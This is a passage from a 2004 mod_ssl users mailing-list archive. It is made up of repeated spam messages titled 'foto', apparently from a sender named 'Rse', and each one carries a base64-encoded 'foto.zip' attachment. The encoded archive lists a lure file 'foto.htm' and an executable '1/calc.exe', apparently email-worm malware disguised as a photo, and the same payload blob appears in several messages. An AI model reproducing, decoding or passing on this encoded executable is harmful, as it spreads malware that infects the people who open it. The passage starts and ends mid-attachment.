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
UEsFBgAAAAADAAMAngAAABoRAAAAAA==

----------pvpmxeerarqstkfmakqh--

______________________________________________________________________
Apache Interface to OpenSSL (mod_ssl)                   www.modssl.org
User Support Mailing List                      modssl-users@modssl.org
Automated List Manager                            majordomo@modssl.org

From owner-modssl-users@modssl.org  Wed Sep  1 07:31:52 2004
Return-Path: 
X-Original-To: modssl-users-L
Delivered-To: modssl-users-L@master.modssl.org
Received: by master.modssl.org (Postfix, from userid 4003)
	id B77D3A8995; Wed,  1 Sep 2004 07:31:52 +0200 (CEST)
X-Original-To: modssl-users@modssl.org
Delivered-To: modssl-users@modssl.org
Received: from PANDATA.com (host-234.86.64.82.ispkenya.com [64.86.234.82])
	by master.modssl.org (Postfix) with SMTP id 82E4CA8943
	for ; Wed,  1 Sep 2004 07:31:42 +0200 (CEST)
Date: Wed, 01 Sep 2004 08:31:25 +0300
To: "Modssl-users" 
From: "Rse" 
Subject: foto
Message-ID: 
MIME-Version: 1.0
Content-Type: multipart/mixed;
        boundary="--------ndilkhmjotmreqeeqeej"
Sender: owner-modssl-users@modssl.org
Precedence: bulk
Reply-To: modssl-users@modssl.org
X-Sender: "Rse" 
X-List-Manager: Majordomo [version 1.94.5]
X-List-Name: modssl-users

----------ndilkhmjotmreqeeqeej
Content-Type: text/html; charset="us-ascii"
Content-Transfer-Encoding: 7bit


foto







----------ndilkhmjotmreqeeqeej
Content-Type: application/octet-stream; name="foto.zip"
Content-Transfer-Encoding: base64
Content-Disposition: attachment; filename="foto.zip"

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
UEsFBgAAAAADAAMAngAAABoRAAAAAA==

----------ndilkhmjotmreqeeqeej--

______________________________________________________________________
Apache Interface to OpenSSL (mod_ssl)                   www.modssl.org
User Support Mailing List                      modssl-users@modssl.org
Automated List Manager                            majordomo@modssl.org

From owner-modssl-users@modssl.org  Wed Sep  1 08:30:06 2004
Return-Path: 
X-Original-To: modssl-users-L
Delivered-To: modssl-users-L@master.modssl.org
Received: by master.modssl.org (Postfix, from userid 4003)
	id AF916A8943; Wed,  1 Sep 2004 08:30:06 +0200 (CEST)
X-Original-To: modssl-users@modssl.org
Delivered-To: modssl-users@modssl.org
Received: from csie-o4msz8u2k2.net (218-168-205-88.dynamic.hinet.net [218.168.205.88])
	by master.modssl.org (Postfix) with SMTP id 84DA6A8934
	for ; Wed,  1 Sep 2004 08:29:54 +0200 (CEST)
Date: Wed, 01 Sep 2004 14:23:22 +0800
To: "Modssl-users" 
From: "Rse" 
Subject: foto
Message-ID: 
MIME-Version: 1.0
Content-Type: multipart/mixed;
        boundary="--------vvkuhhetmkrxmkozacgb"
Sender: owner-modssl-users@modssl.org
Precedence: bulk
Reply-To: modssl-users@modssl.org
X-Sender: "Rse" 
X-List-Manager: Majordomo [version 1.94.5]
X-List-Name: modssl-users

----------vvkuhhetmkrxmkozacgb
Content-Type: text/html; charset="us-ascii"
Content-Transfer-Encoding: 7bit


foto







----------vvkuhhetmkrxmkozacgb
Content-Type: application/octet-stream; name="foto.zip"
Content-Transfer-Encoding: base64
Content-Disposition: attachment; filename="foto.zip"

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
